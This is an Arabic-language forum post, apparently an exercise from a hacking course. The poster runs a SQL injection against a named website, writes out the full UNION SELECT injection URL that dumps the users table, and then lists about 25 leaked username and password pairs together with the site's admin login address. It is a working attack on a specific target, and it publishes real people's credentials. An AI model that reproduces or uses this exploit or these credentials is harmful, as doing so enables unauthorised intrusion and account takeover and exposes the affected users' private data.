السلام عليكم
اعتمادا على المشاركة التالية :
تطبيق دروس الدورة
سأقوم بعون الله باستغلال الثغراث الموجودة في الرابط ( ثغرات sql4 ; sql5) .
الموقع الأول هو
http://www.jlm.israel.net
الاستغلال :
كود PHP:
http://www.jlm.israel.net/home/event.php?id=-11525%20UNION%20SELECT%201,2,3,4,5,6,group_concat%28username,0x3a,password%29,8,9,10,11,12,13,14,15,16,17%20from%20users--
بعض المعلومات : اليوزر الباس
alexroskin:20102010,
Artel:jazzist,
ood:20102010,
noc:20102010,
Uganda:taybeh,
Paco:tekno,
NoCoast:adlersev,
music house:yaad,
abu noam:agron,
Stardust:shingold,
hadaral:20102010,
HAZIRA:arizah,
offthewall:mashbeer,
dremail:creative,
yuvalhaber:131084,
yuvikruvi:131083,
eladkin:adelk197,
GushPunkA:duapbet,
dina:dinakor1,
rachey:noam666,
-nem-:gunraur.,
maataroze:dovdvo,
barfaber:dovdov,
AIC:chegueva,
garindvash:greendva
الدخول من هنا
http://www.jlm.israel.net/home/cms/index.php
لكم تحياتي
l,hru di,]dm jl hgjsgg hgdih >